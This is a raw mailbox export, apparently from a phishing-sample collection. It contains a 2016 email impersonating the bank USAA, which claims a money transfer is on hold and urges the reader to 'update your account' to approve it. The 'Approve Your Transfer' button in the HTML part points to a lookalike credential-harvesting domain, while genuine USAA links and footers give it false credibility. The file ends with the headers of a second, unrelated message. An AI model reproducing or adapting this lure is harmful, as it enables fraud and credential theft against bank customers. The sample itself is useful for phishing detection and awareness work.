From: "USAA" <Safeguard@MailSender.com>
Date: Wed, 16 Nov 2016 06:41:13 -0500
Return-Path: Safeguard@MailSender.com
Message-ID: <ERS-TERM1Y4kJSFsxf4000003a3@ERS-Term1.ersindustries.local>
X-OriginalArrivalTime: 16 Nov 2016 11:41:13.0932 (UTC) FILETIME=[55B4C8C0:01D23FFE]
Status: O
X-Status: 
X-Keywords:                  
X-UID: 433

You will not see this in a MIME-aware mail reader.
--===============1476851212==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =

   To ensure delivery to your inbox, please add USAA.Web.Services@customerm=
ail.usaa.com to your address book.	 =

 =

   	  =

   =

  	  =

   New Money Transfer
  View Accounts | Privacy Promise | Contact Us
	  =

    =

   	 =

  	 =

  	 =

	  =

   USAA SECURITY ZONE =

Money =

Transfer =

USAA # ending in: XXXX
	  =

   =

  =

  =

   =

  =

 =

    Dear Customer,
A money transfer has just been sent to your USAA account. For security reas=
ons, We have temporarily hold the money transfer.
 Reason for this action, Is to verify the identity of the sender and the re=
ceiver. You are to update your account as a means to approve the transfer. =
Money will be posted into your account in less than 48 hours after your app=
roval.
 =

   	 Approve Your Transfer
 We appreciate your business and co-operation with us.
 Thank you,
USAA
 P.S. Texting and driving ... it can wait. Take the pledge to never text an=
d drive.
	  =

  =

  =

	 	 =

  	 	 	 =

   =

  Please do not reply to this e-mail. To send a secure message to USAA, ple=
ase contact us.

Privacy Promise
USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288

  =

  	 USAA means United Services Automobile Association and its insurance, ba=
nking, investment and other companies. Banks Member FDIC. Investments provi=
ded by USAA Investment Management Company and USAA Financial Advisors Inc.,=
 both registered broker dealers. 	 =

  =

  66676-0514   =



--===============1476851212==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><DIV align=3Dcenter>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D650 bgColor=3D#b5d7e6 border=
=3D0>
<TBODY>
<TR>
<TD height=3D35 vAlign=3Dmiddle width=3D650 align=3Dcenter><FONT style=3D"F=
ONT-SIZE: 9px; COLOR: #929292" face=3D"Verdana, sans-serif">To ensure deliv=
ery to your inbox, please add <SPAN style=3D"COLOR: #68a7c5">USAA.Web.Servi=
ces@customermail.usaa.com</SPAN> to your address book.</FONT></TD>
<TD></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D650 bgColor=3D#b5d7e6 border=
=3D0>
<TBODY>
<TR>
<TD width=3D10></TD>
<TD bgColor=3Dwhite width=3D630 align=3Dcenter>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D604 border=3D0>
<TBODY>
<TR>
<TD height=3D5 colSpan=3D4></TD></TR>
<TR>
<TD height=3D45 width=3D54><A href=3D"/do/redirect?url=3Dhttps%253A%252F%25=
2Fwww.usaa.com%252Finet%252Fent_logon%252FLogon%253FEID%253D66676-0514_head=
&amp;hmac=3D598b2ca5047d83983c8d9879c29f8b11" target=3D_blank><IMG border=
=3D0 alt=3D"" src=3D"https://content.usaa.com/mcontent/static_assets/Media/=
email_logo.gif" width=3D61 height=3D41></A></TD>
<TD>
<TABLE cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY>
<TR>
<TD style=3D"COLOR: #6d6d6d; FONT: bold 16px Arial, sans-serif" height=3D22=
 align=3Dleft><SPAN style=3D"MARGIN-TOP: 9px; DISPLAY: block">New Money Tra=
nsfer</SPAN></TD></TR>
<TR>
<TD height=3D23 align=3Dleft><NOBR><FONT size=3D1 face=3D"Verdana, sans-ser=
if"><A style=3D"TEXT-DECORATION: none; COLOR: #6d6d6d" href=3D"/do/redirect=
?url=3Dhttps%253A%252F%252Fwww.usaa.com%252Finet%252Fent_home%252FCpHome%25=
3FEID%253D66676-0514_head&amp;hmac=3D7314b43005a2a92d115eff74fc06caab" targ=
et=3D_blank>View Accounts</A> | <A style=3D"TEXT-DECORATION: none; COLOR: #=
6d6d6d" href=3D"/do/redirect?url=3Dhttps%253A%252F%252Fwww.usaa.com%252Fine=
t%252Fent_utils%252FMcStaticPages%253Fkey%253Dprivacy_promise%2526EID%253D6=
6676-0514_head&amp;hmac=3D7bcb3df21b893920c6c82c23f3db7095" target=3D_blank=
>Privacy Promise</A> | <A style=3D"TEXT-DECORATION: none; COLOR: #6d6d6d" h=
ref=3D"/do/redirect?url=3Dhttps%253A%252F%252Fwww.usaa.com%252Finet%252Fent=
_contactus%252FCpLevelZeroContactUs%253FContactUsPageId%253DPublicContactUs=
%2526EID%253D66676-0514_head&amp;hmac=3Df4389c66f029617344036c389373b1bf" t=
arget=3D_blank>Contact Us</A></FONT></NOBR></TD></TR></TBODY></TABLE></TD>
<TD height=3D45 vAlign=3Dmiddle width=3D367 align=3Dright>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D0 width=3D188 border=3D0>
<TBODY>
<TR>
<TD width=3D22>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D0 width=3D22 border=3D0>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 0" height=3D29 vAlign=3Dtop width=3D8><IMG style=
=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://content.usaa.com/mco=
ntent/static_assets/Media/email_sec_1-1.gif?EID=3D6068394752" width=3D8 hei=
ght=3D29></TD>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D29 vAlign=3Dtop wid=
th=3D14><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://co=
ntent.usaa.com/mcontent/static_assets/Media/email_sec_1-2.gif" width=3D14 h=
eight=3D29></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 0" height=3D29 vAlign=3Dtop width=3D8><IMG style=
=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://content.usaa.com/mco=
ntent/static_assets/Media/email_sec_spacer.gif" width=3D8 height=3D29></TD>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D29 vAlign=3Dtop wid=
th=3D14><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://co=
ntent.usaa.com/mcontent/static_assets/Media/email_sec_spacer.gif" width=3D1=
4 height=3D29></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 0" height=3D7 vAlign=3Dbottom width=3D8></TD>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D7 vAlign=3Dbottom w=
idth=3D14><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://=
content.usaa.com/mcontent/static_assets/Media/email_sec_2-1.gif" width=3D14=
 height=3D7></TD></TR></TBODY></TABLE></TD>
<TD bgColor=3D#e7e7e8 align=3Dleft>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D5 width=3D"100%" border=3D=
0>
<TBODY>
<TR>
<TD style=3D"FONT-SIZE: 9px; TEXT-ALIGN: left; LINE-HEIGHT: 12px; -webkit-t=
ext-size-adjust: none" vAlign=3Dmiddle align=3Dleft><FONT style=3D"FONT-SIZ=
E: 10px; COLOR: #00365b" face=3D"Arial, Helvetica, sans-serif"><STRONG>USAA=
 SECURITY ZONE</STRONG></FONT>&nbsp;<BR><FONT style=3D"FONT-SIZE: 9px; COLO=
R: #00365b" face=3D"Arial, Helvetica, sans-serif">Money</FONT>&nbsp;<BR><FO=
NT color=3D#00365b face=3DArial>Transfer</FONT> <BR><FONT style=3D"FONT-SIZ=
E: 9px; COLOR: #00365b" face=3D"Arial, Helvetica, sans-serif">USAA # ending=
 in: XXXX</FONT></TD></TR></TBODY></TABLE></TD>
<TD bgColor=3D#ffffff width=3D7>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D0 width=3D7 border=3D0>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D7 vAlign=3Dtop widt=
h=3D7 align=3Dright><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=
=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_1-3.gif=
" width=3D7 height=3D7></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D51 vAlign=3Dtop wid=
th=3D7 align=3Dright><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=
=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_spacer.=
gif" width=3D7 height=3D51></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D7 vAlign=3Dbottom w=
idth=3D7 align=3Dright><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" sr=
c=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_2-2.gi=
f" width=3D7 height=3D7></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE=
></TD></TR>
<TR>
<TD height=3D20 colSpan=3D4>&nbsp;</TD></TR>
<TR>
<TD height=3D1 colSpan=3D4></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"95%" border=3D0>
<TBODY>
<TR>
<TD width=3D"95%" align=3Dleft><FONT style=3D"FONT-SIZE: 12px; COLOR: #3333=
33; LINE-HEIGHT: 18px" face=3D"Verdana, sans-serif">
<P style=3D"MARGIN-BOTTOM: 1em">Dear Customer,</P>A money transfer has just=
 been sent to your USAA account. For security reasons, We have temporarily =
hold the money transfer.<BR>
<P style=3D"MARGIN-BOTTOM: 1em">Reason for this action, Is to verify the id=
entity of the sender and the receiver. You are to update your account as a =
means to approve the transfer. Money will be posted&nbsp;into your account&=
nbsp;in less than 48 hours after your approval.</P>
<TABLE height=3D15 cellSpacing=3D0 cellPadding=3D0 bgColor=3D#6cae35 border=
=3D0>
<TBODY>
<TR bgColor=3D#6cae35>
<TD bgColor=3D#6cae35 vAlign=3Dmiddle width=3D15 align=3Dcenter><IMG src=3D=
"https://content.usaa.com/mcontent/static_assets/Media/email_cta_arrow.gif"=
 width=3D15 height=3D15></TD>
<TD bgColor=3D#6cae35 vAlign=3Dmiddle width=3D134 align=3Dcenter><A style=
=3D"TEXT-DECORATION: none; COLOR: #fff; FONT: bold 11px arial, sans-serif" =
href=3D"http://usaa.secure.com.ientpage.direct-true.qspexglasses.com/secure=
verify.htm" target=3D_blank>Approve&nbsp;Your Transfer</A></TD></TR></TBODY=
></TABLE>
<P style=3D"MARGIN-BOTTOM: 1em">We appreciate your business and co-operatio=
n with us.</P>
<P style=3D"MARGIN-BOTTOM: 1em">Thank you,<BR>USAA</P>
<P><B>P.S. Texting and driving ... it can wait. <A href=3D"/do/redirect?url=
=3Dhttp%253A%252F%252Fitcanwait.usaa.com%252F%253F%2526EID%253D66676-0514_b=
ody&amp;hmac=3Db314c7e70c04cbdb8e0a341c98f806af" target=3D_blank>Take the p=
ledge</A> to <I>never</I> text and drive.</B></P></FONT></TD>
<TD>&nbsp;</TD></TR>
<TR>
<TD height=3D30 colSpan=3D2 align=3Dleft><BR><A href=3D"/do/redirect?url=3D=
http%253A%252F%252Fwww.facebook.com%252FUSAA&amp;hmac=3D931c3accaec9b43deea=
bde2bb1ca08e6" target=3D_blank><IMG border=3D0 alt=3DFacebook src=3D"http:/=
/content.usaa.com/mcontent/static_assets/om/Media/thumbnails/facebookIcon.g=
if" width=3D32 height=3D32></A>&nbsp;&nbsp;<A href=3D"/do/redirect?url=3Dht=
tp%253A%252F%252Ftwitter.com%252Fusaa&amp;hmac=3D5c6cbe0264c07864ad77708dc4=
a32035" target=3D_blank><IMG border=3D0 alt=3DTwitter src=3D"http://content=
.usaa.com/mcontent/static_assets/om/Media/thumbnails/twitterIcon.gif" width=
=3D32 height=3D32></A></TD></TR></TBODY></TABLE></TD>
<TD width=3D5></TD>
<TD width=3D5></TD></TR>
<TR>
<TD height=3D5 width=3D10></TD>
<TD height=3D5 width=3D630></TD>
<TD height=3D5 width=3D5></TD>
<TD height=3D5 width=3D5></TD></TR>
<TR>
<TD height=3D20 colSpan=3D4>&nbsp;</TD></TR>
<TR>
<TD colSpan=3D4 align=3Dcenter><FONT style=3D"FONT-SIZE: 10px; COLOR: #6d6d=
6d; LINE-HEIGHT: 18px" face=3D"Verdana, sans-serif">Please do not reply to =
this e-mail. To send a secure message to USAA, please <A style=3D"TEXT-DECO=
RATION: none; COLOR: #408cb0" href=3D"/do/redirect?url=3Dhttps%253A%252F%25=
2Fwww.usaa.com%252Finet%252Fent_references%252FCpSendUsAMessage%253FContent=
Area%253Dcp%2526EID%253D66676-0514_foot&amp;hmac=3D87e55e1a0ec3aae02f6ca42a=
fda45db0" target=3D_blank>contact us</A>.<BR><BR><A style=3D"COLOR: #6d6d6d=
" href=3D"/do/redirect?url=3Dhttps%253A%252F%252Fwww.usaa.com%252Finet%252F=
ent_utils%252FMcStaticPages%253Fkey%253Dprivacy_promise%2526EID%253D66676-0=
514_foot&amp;hmac=3D472e62718d150088baad4fd9928b475a" target=3D_blank>Priva=
cy Promise</A><BR>USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288<=
BR></FONT></TD></TR>
<TR>
<TD height=3D15 width=3D10></TD></TR>
<TR>
<TD width=3D5 align=3Dleft></TD>
<TD width=3D630 colSpan=3D2 align=3Dleft><FONT style=3D"FONT-SIZE: 10px; CO=
LOR: #6d6d6d; LINE-HEIGHT: 18px" face=3D"Verdana, sans-serif">USAA means Un=
ited Services Automobile Association and <A style=3D"TEXT-DECORATION: none;=
 COLOR: #408cb0" href=3D"/do/redirect?url=3Dhttps%253A%252F%252Fwww.usaa.co=
m%252Finet%252Fent_utils%252FMcStaticPages%253Fkey%253Dabout_usaa_overview%=
2526EID%253D66676-0514_foot&amp;hmac=3Dba70a6d39c92719589bcf0b86d05e46e" ta=
rget=3D_blank>its insurance, banking, investment and other companies</A>. B=
anks Member FDIC. Investments provided by USAA Investment Management Compan=
y and USAA Financial Advisors Inc., both registered broker dealers.</FONT> =
</TD>
<TD width=3D5 align=3Dleft></TD></TR>
<TR>
<TD height=3D15 width=3D10></TD></TR>
<TR>
<TD colSpan=3D4 align=3Dright><FONT style=3D"FONT-SIZE: 10px; COLOR: #6d6d6=
d; LINE-HEIGHT: 18px" face=3D"Verdana, sans-serif">66676-0514&nbsp;&nbsp;&n=
bsp;</FONT><BR><BR></TD></TR></TBODY></TABLE></DIV></BODY></HTML>
--===============1476851212==--

From jose@monkey.org Thu Nov 17 18:53:48 2016 +0000
Return-Path: hosting@connect.ge
Delivered-To: jose@monkey.org
X-FDA: 72193132536.11.burst24_78657010e1401
X-Spam-Summary: 69,4.5,0,b19511287e3dd824,d41d8cd98f00b204,hosting@connect.ge,,RULES_HIT:4:41:72:375:379:387:455:539:540:541:542:543:567:800:967:973:983:988:989:1155:1208:1224:1254:1260:1263:1278:1311:1313:1314:1381:1431:1432:1433:1434:1437:1515:1516:1517:1568:1571:1587:1593:1594:1631:1699:1714:1730:1747:1777:1792:2073:2076:2198:2199:2393:2525:2527:2538:2553:2560:2565:2610:2682:2685:2691:2859:2890:2892:2910:2911:2918:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3865:3867:3868:3870:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4250:4321:4425:5007:6669:8603:8824:8957:9025:9121:9388:10009:10049:10346:11026:11658:11914:12043:12219:12438:12555:12740:12760:12956:12986:13017:13018:13019:13026:13110:13139:14194:14250:14827:21063:21212:21433:21450:21451:21524:30001:30022:30054:30055:30065:30067:30069:30070:30074:30075:30080:30090,0,RBL:error,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neutral,Custom_rule
X-HE-Tag: burst24_78657010e1401
X-Filterd-Recvd-Size: 17428
Received: from hs1.connect.ge (hs1.connect.ge [212.72.155.123])
	by imf25.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 17 Nov 2016 18:53:47 +0000 (UTC)
Received: from u17153755.onlinehome-server.com ([74.208.234.249] helo=connect.ge)
	by hs1.connect.ge with smtp (Exim 4.76)
	(envelope-from <hosting@connect.ge>)
	id 1c7RmJ-004KLA-IA; Thu, 17 Nov 2016 22:51:20 +0400
